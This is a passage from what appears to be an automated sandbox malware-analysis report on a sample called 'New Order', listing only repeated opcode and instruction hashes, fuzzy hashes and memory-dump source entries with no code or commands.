                                                                                                                              • Opcode Fuzzy Hash: c956d5f08eab52ffd5d3d7274250c3d0d53ee30c97d4bddbabe621c7ae12919c
                                                                                                                              • Instruction Fuzzy Hash: 4901B5321401119FDB32AE198490D66BBBAFF61764B94482EE645DB251C720BE41CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                              • Instruction ID: bdd6cf08b8f8465f83ab0363c46927b8bd514e4c69ebc21ed80cc3589dde3aea
                                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                              • Instruction Fuzzy Hash: 9D01B5321007099FEB2396ADC800EA7B7E9FFC5314F04495DAE46CB650DA74E642C751
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0880908625daf242fc33eaa8827c34e85fa6a063b1f033d5c5c87422fb8fcabd
                                                                                                                              • Instruction ID: ec3bf9d7bc1bab835b991f434b90b74cd3e99cbd0a0938df014337ca66b9ddef
                                                                                                                              • Opcode Fuzzy Hash: 0880908625daf242fc33eaa8827c34e85fa6a063b1f033d5c5c87422fb8fcabd
                                                                                                                              • Instruction Fuzzy Hash: DB116D35A0120DEBDB05EFA8D850FAE7BB6EB44344F104059F906D7250DA35EF11CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e75990d78a4cb036cdd1dd1d680815a9630ea64b1bf50b668c268221c3ae3bd1
                                                                                                                              • Instruction ID: 45e64075375a6dfb3558126facdf6e7a5b66be0dae5fc66242a1e5310033b402
                                                                                                                              • Opcode Fuzzy Hash: e75990d78a4cb036cdd1dd1d680815a9630ea64b1bf50b668c268221c3ae3bd1
                                                                                                                              • Instruction Fuzzy Hash: 9E01DF72610A02BBC311BB2DCD80E53BBADFB947A4B000629F605C3650EB24EE01C6E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2bf09f1de6902e566e4e568cdb70679f26fa52a2c35c5356c02c8d454f27508e
                                                                                                                              • Instruction ID: a4b2817b5af2c9582a0d673208b1ca45411785c524fb5968b48528c1702df133
                                                                                                                              • Opcode Fuzzy Hash: 2bf09f1de6902e566e4e568cdb70679f26fa52a2c35c5356c02c8d454f27508e
                                                                                                                              • Instruction Fuzzy Hash: E201FC322142169BC720DF6EC848D67BBE8FF54764F654129ED59C7180F7349A01C7D1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bd275c3eb20093ae5eccdfb78ca7c39998e1fb6bb9e8d04624567989b58739a2
                                                                                                                              • Instruction ID: 6fa0d51e4328b501fbc8e19b1ad8c40f0ad255d82a045b28681fa0a00a5bdf1a
                                                                                                                              • Opcode Fuzzy Hash: bd275c3eb20093ae5eccdfb78ca7c39998e1fb6bb9e8d04624567989b58739a2
                                                                                                                              • Instruction Fuzzy Hash: 3C115B71A0120DABDB15EFA8C880EEE7BB5EB48354F104099BD01D7344DB34EA51CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: beeeaa9ce26e05ed4db198cbf759fbd4d7a466768c55de02d47ee1f15f0db72e
                                                                                                                              • Instruction ID: 9e2f162c242b6fbfcb9762b3912b9d319d5bd4b889b59cf9c039e3bda87ff84d
                                                                                                                              • Opcode Fuzzy Hash: beeeaa9ce26e05ed4db198cbf759fbd4d7a466768c55de02d47ee1f15f0db72e
                                                                                                                              • Instruction Fuzzy Hash: CB1139B16183099FC700DF6DD841A9BBBE8EF98710F00455EB998D7395E670EA10CBA6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                              • Instruction ID: 28f4b68403491788d09d350625ffd7d47c52f9273ba5c29b227d1f64bf94921f
                                                                                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                              • Instruction Fuzzy Hash: 3701D4322007069FD7219A6DD844F96BBEAFBC5310F044859F642CBA90EAB0F980C795
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 58719d3729c84cac42b3ea03e31e5d43fa2f8b6c639c45e52f28a6a4a4616bd2
                                                                                                                              • Instruction ID: 4b3e85b76ad1113b76cd670397bd8ef729cb62557c610b14adeb05c3fbe4ca58
                                                                                                                              • Opcode Fuzzy Hash: 58719d3729c84cac42b3ea03e31e5d43fa2f8b6c639c45e52f28a6a4a4616bd2
                                                                                                                              • Instruction Fuzzy Hash: B3113CB16183099FC710DF6DD44195BBBE4FF99750F00451EB998D7354E630EA00CBA6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                              • Instruction ID: c619072081ee11728d48b05bd567d1a6e66f6184d711be8181722a9de57c5158
                                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                              • Instruction Fuzzy Hash: 92017C32600584DFE323D71DC948F667BDCFB44B58F0914A1FD05CBA92D628DE40C621
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e46e43cb741b8d5461c4d106a0835d675f9554c7ab63152596f809cf4a92f689
                                                                                                                              • Instruction ID: 3d91be4de126070aae9da68630384c242e485051549e5a86ef93a854b5d1a55a
                                                                                                                              • Opcode Fuzzy Hash: e46e43cb741b8d5461c4d106a0835d675f9554c7ab63152596f809cf4a92f689
                                                                                                                              • Instruction Fuzzy Hash: D0018F356045099FDB14EB6DDC089AFB7B9EF85220B15406D9A01EB784EE30EE02C792
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 45ad6ddb174cafcde522b69ff28203aec7e7e977a8d98c811b862a5338e6eebe
                                                                                                                              • Instruction ID: 6128a958dc46be00de3c39a746065db11db514d925870b92c137852c42630025
                                                                                                                              • Opcode Fuzzy Hash: 45ad6ddb174cafcde522b69ff28203aec7e7e977a8d98c811b862a5338e6eebe
                                                                                                                              • Instruction Fuzzy Hash: 8001A7712407059FE3315F1AD840F02BAA9EF55B50F11482EB705DF390D6B1AA41CB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b35e27550406d0dfddd5a9b99e929859f79412a09be5788623a0ed5fda1cce89
                                                                                                                              • Instruction ID: bcb07dce67019c7b3b29653bd4499d7202f2821bb1515919fc82d6a2b2b7214a
                                                                                                                              • Opcode Fuzzy Hash: b35e27550406d0dfddd5a9b99e929859f79412a09be5788623a0ed5fda1cce89
                                                                                                                              • Instruction Fuzzy Hash: E7F0F933A41A14BBC7729B5A8C84F477EAEEB84B90F104028BA05D7640D670EE01CAA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                              • Instruction ID: aba7fc73540be0162f76f21e3474fdf8c2375ebc3011adfd88fe3e86216a0f7a
                                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                              • Instruction Fuzzy Hash: ECF04FB2A00625ABD325CF4D9840E67FBEADBD5B90F058129E955D7220EA31DE05CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                              • Instruction ID: 2599357dca2fa8eb73410f893fb30cfb5a8e841670f137b0e64507bb6c0130d8
                                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                              • Instruction Fuzzy Hash: B4F0FC332046279BD733165D8840F2BFA95CFD5BE4F1A043DE7059B304C9608D0196D3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                              • Instruction ID: 15f2bdeb935a43ffb387e94bdeac00d5057763f7fdd9af3d041ca615f5b15072
                                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                              • Instruction Fuzzy Hash: 4D01F9322006899BD322971DC849F59BFD9EF92754F0D4066FE04EB691D7B8CA01C251
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b0769f88dd2a96263d0d61d0895a7953a9ba83113401eeb1d4807dcf5675cc4a
                                                                                                                              • Instruction ID: 142d0f253937ca967487729fd5e005aa91bb38f36b8126eb4b052f842d624682
                                                                                                                              • Opcode Fuzzy Hash: b0769f88dd2a96263d0d61d0895a7953a9ba83113401eeb1d4807dcf5675cc4a
                                                                                                                              • Instruction Fuzzy Hash: 0D014F71A0025D9BDB04DFA9D445AEEBBF8FF58314F14405AE905E7280EB74EB01CB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                              • Instruction ID: e3ba69fd3be968e9209cd2d44656c38baecff098c868abed509de99a4f09a7f8
                                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                              • Instruction Fuzzy Hash: 4AF0127220001DBFEF029F98DD80DAF7B7DFB55398B204125FA11D2160E631DE21A7A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: afddcd8f2ee9abd27d52520f8171eb45f2a181b23dc2712b7e8fbbac6f77e10e
                                                                                                                              • Instruction ID: ab21053a75e0b1e9fee0a756863fe884b3346777d5aa290761032bcbc92eca8e
                                                                                                                              • Opcode Fuzzy Hash: afddcd8f2ee9abd27d52520f8171eb45f2a181b23dc2712b7e8fbbac6f77e10e
                                                                                                                              • Instruction Fuzzy Hash: 83018936100149ABCF12AE88D840EDA3F66FB4C764F058116FE18A6260C336DAB0EF91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 17e014bb7695a48747077189e67f76f6ef1db7094288a6653dbb380f20000547
                                                                                                                              • Instruction ID: cb4b12a0a21c6b6c620fa8f807f7f8307a74ed27f3dd78896ac0bcdadd6807e0
                                                                                                                              • Opcode Fuzzy Hash: 17e014bb7695a48747077189e67f76f6ef1db7094288a6653dbb380f20000547
                                                                                                                              • Instruction Fuzzy Hash: B9F02BB12042495BF356951D8C01F23B2AAE7C0754FB5807DEB058B3C1FA71DC1183A5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cbf3e2789b2f9449366b739104bf9b1c57dace49faa0ef3ff2ce0c1bb55280a4
                                                                                                                              • Instruction ID: 5760cdf0aaf6c7bb2889342d5075094735664afa14beb57458d1391ab01dcc26
                                                                                                                              • Opcode Fuzzy Hash: cbf3e2789b2f9449366b739104bf9b1c57dace49faa0ef3ff2ce0c1bb55280a4
                                                                                                                              • Instruction Fuzzy Hash: 0301A470305685EBE322AB6CCD48F253BA9BB80B04F5801A4BA15DB6D6E728D7018621
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction ID: 79307dc28da84dbd81a628fce33d393506385dd1a96d89ee0aaef7d680f257ef
                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction Fuzzy Hash: FCF0BE36341A1347FF36AA2E8820F2FAA95AF90B01B4D452C9701CB680DFA0DA048791
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5b68732047824c74e23c6dedb469928befef73357a92cee8d2635a240fd3feee
                                                                                                                              • Instruction ID: 8263d7c72be27777e3a26be97c0f49a3404a682837cefd35aa45f44a14fe2624
                                                                                                                              • Opcode Fuzzy Hash: 5b68732047824c74e23c6dedb469928befef73357a92cee8d2635a240fd3feee
                                                                                                                              • Instruction Fuzzy Hash: 96F0AF716193089FC310EF68C441A1AB7E4FF98714F80465ABC98DB394EA34EA00CB96
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction ID: 50019c138f585666e514ce002170ac783669d93318d4763b2f95a417484cf28c
                                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction Fuzzy Hash: C2F082337256229BE331AA4ECC80F1AB7A8EFD5B60F190065AA04DB264C760ED01C7D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                              • Instruction ID: c50ffdaa2d8e69c378ffbe1c6d7c8a792063c53277aa0e9441fdb46fc22ef15d
                                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                              • Instruction Fuzzy Hash: 87F0B472614204AFE714DF25CC05F56B6E9EFE8344F188078AA45D7264FAB0DE01C694
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4f5ed9a31cc03a12517ee802cc08bdfd042ed66dc823db68979c934a6cf6ff51
                                                                                                                              • Instruction ID: 0dfd6370299495307dc79a6b58538d439fd37e321c632dfb2d023aa5c97d6d8c
                                                                                                                              • Opcode Fuzzy Hash: 4f5ed9a31cc03a12517ee802cc08bdfd042ed66dc823db68979c934a6cf6ff51
                                                                                                                              • Instruction Fuzzy Hash: C3F04F70A0124D9FCB04EFA9C515A9EB7B4EF18304F10805AB955EB385DA38EB01CB65
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a1c8135be5ef06a9ca61923b5ab7194f6cd148cc1079ee93230a3e7e2f818f6b
                                                                                                                              • Instruction ID: 8c4e3b7d500fabe56c742b08e6b459b922c90480c501e4368df5c0bdaed89f83
                                                                                                                              • Opcode Fuzzy Hash: a1c8135be5ef06a9ca61923b5ab7194f6cd148cc1079ee93230a3e7e2f818f6b
                                                                                                                              • Instruction Fuzzy Hash: 95F0F0719862DC9EE7A38B2CC804B21BBD49B08725F084C6AC789C3582C7A0DB80C611
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2c5e31ff7707414a08b9062473e0b9e3c6a8e032f3c15aeb243ecc35ae5a91aa
                                                                                                                              • Instruction ID: 61490b3ac7fdae6d6a818f77c6ce5e28559c26970875ce5e069f4a0259fc093e
                                                                                                                              • Opcode Fuzzy Hash: 2c5e31ff7707414a08b9062473e0b9e3c6a8e032f3c15aeb243ecc35ae5a91aa
                                                                                                                              • Instruction Fuzzy Hash: 66F0272A516A8086CF325B2C68907D5AB54E781B50F29114ED9A0D7306E578C783CB21
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5409087c610923569d1ecfd2c27b1240386f0d981bae312b5fcdc36fe1ecdb8b
                                                                                                                              • Instruction ID: 9d1e05f104e1818094bf8a5da35b25dda0106a72e2804225917b97779330c6db
                                                                                                                              • Opcode Fuzzy Hash: 5409087c610923569d1ecfd2c27b1240386f0d981bae312b5fcdc36fe1ecdb8b
                                                                                                                              • Instruction Fuzzy Hash: A4F052714012809FEB22876CC408B11BBE89B807A4F0C982FC402D3522E720EA80DAD1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction ID: dea38223d81a9030c3e2799aa883fdf6a07f0126b0911190512c0b6f3d070b60
                                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction Fuzzy Hash: 5DE092323006016BE7219E5D9C80F477B6E9FD6B10F040079B5049F251C9E29E0986A5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction ID: 6ef3f9e976feb1cafd27223dcc7a2fa66d2857b1c82248d1343d1692b9f56db0
                                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction Fuzzy Hash: 3EF06572104204DFE7218F09DD84F52BBF8EB55768F59C026E609EB561E379ED40CBA4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                              • Instruction ID: 4a5aa71b918d5a70cda6bd4f15242ec948eb73f0e7f335ceb14ecf31dc65c5a7
                                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                              • Instruction Fuzzy Hash: 3EF0E53A2047499BDB57CF19C440A957BA8FB413A0B044054FC46CB341D736EB81CB51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                              • Instruction ID: 873a9a8245a1f535bdca283f720f231c133ae2395e49e6323e0c15ee28125c68
